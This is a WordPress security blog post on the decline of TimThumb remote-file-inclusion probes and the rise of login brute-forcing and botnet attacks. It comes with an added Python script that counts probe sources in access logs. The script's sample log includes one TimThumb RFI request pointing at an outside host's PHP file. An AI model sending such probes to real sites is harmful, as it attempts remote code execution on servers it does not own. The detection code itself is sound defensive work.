Fewer TimThumb Attacks
Are We Seeing an End to Timthumb Attacks on WordPress?
Lately we have seen a decline in the number of TimThumb RFI attacks against our WordPress sites. A year ago this was the most common hacking probe logged for every WordPress site we manage. Back then we’d see a lot: from 10 to 50, sometimes more, different sources a day. Hardly a day would go by without at least one hacker looking for the vulnerability.
Over the last 6 months, the number of witnessed attempts has declined. Sometimes we don’t see a single probe looking for the old, vulnerable timthumb.php / thumb.php script for several days.
Is it possible hackers are giving up looking for the out-of-date script? It’s 3 years since the vulnerability was identified and patched. Surely by now most WordPress installations are using later versions of core and plugins. Certainly there are still a few old sites with the exploitable scripts. Maybe the recent rise in botnet attacks, and all the security warnings, are encouraging bloggers to update their sites.
TimThumb Attacks Drop, Other Attacks Increase
At the same time, we see a lot more probes for other vulnerabilities. There’s been a sharp rise recently in dictionary attacks on wp-login / wp-admin. We’ve also seen many more probes looking for the WP OnlineStore (osCommerce) exploit, which was also fixed over 2 years ago. Perhaps the difficulty in updating earlier versions of the plugin has left many sites running the old version?
We’ve also seen more botnets attacking WordPress, and more hacked websites being part of these botnets. The hacked sites aren’t limited to WordPress either. It looks like many Joomla users haven’t updated sites that are vulnerable to the JCE editor exploit, allowing a hacker botnet to gain a foothold.
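As an added example (not code from the original post), the following Python script produces the kind of count reported above: distinct source addresses per day probing for timthumb.php / thumb.php, and distinct sources posting to wp-login.php. It assumes Apache/nginx combined-format access logs; the sample log lines are constructed for illustration.

```python
"""Count distinct probe sources per day from a web-server access log.

Added example, not from the original post. Assumes combined log format;
the sample lines below are constructed and use documentation IP ranges.
"""
import re
from collections import defaultdict

# Constructed sample log lines (two days of traffic), for illustration only.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2013:03:14:07 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://203.0.113.9/a.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2013:04:01:22 +0000] "GET /wp-content/thumb.php HTTP/1.1" 404 209 "-" "-"
203.0.113.5 - - [10/Apr/2013:05:30:00 +0000] "GET /wp-content/themes/y/thumb.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Apr/2013:01:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3021 "-" "-"
192.0.2.44 - - [11/Apr/2013:01:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3021 "-" "-"
192.0.2.45 - - [11/Apr/2013:01:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [day:time zone] "METHOD path proto" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/\w{3}/\d{4}):[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"'
)


def classify(method, path):
    """Map one request to a probe category, or None if it is not a probe."""
    script = path.split("?", 1)[0].lower()  # drop the query string
    if script.endswith(("/timthumb.php", "/thumb.php")):
        return "timthumb"
    if method == "POST" and script.endswith("/wp-login.php"):
        return "wp-login"  # a GET of the login page is normal traffic
    return None


def count_probe_sources(log_text):
    """Return {day: {category: number of distinct source IPs}}."""
    sources = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        category = classify(m["method"], m["path"])
        if category:
            sources[m["day"]][category].add(m["ip"])
    return {day: {c: len(ips) for c, ips in cats.items()}
            for day, cats in sources.items()}


if __name__ == "__main__":
    for day, cats in sorted(count_probe_sources(SAMPLE_LOG).items()):
        print(day, dict(cats))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the per-day counts are what the decline described above would show over time.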
- Massive Number Websites in Botnet (graphiclineweb.wordpress.com)
- WordPress admin accounts target of botnet attacks (venturebeat.com)
- Failure to patch leaves many WordPress sites vulnerable (pcworld.com)
- Hackers use botnet to scrape Google for vulnerable sites (infoworld.com)
- About Your WordPress Security… (eleanorprior.com)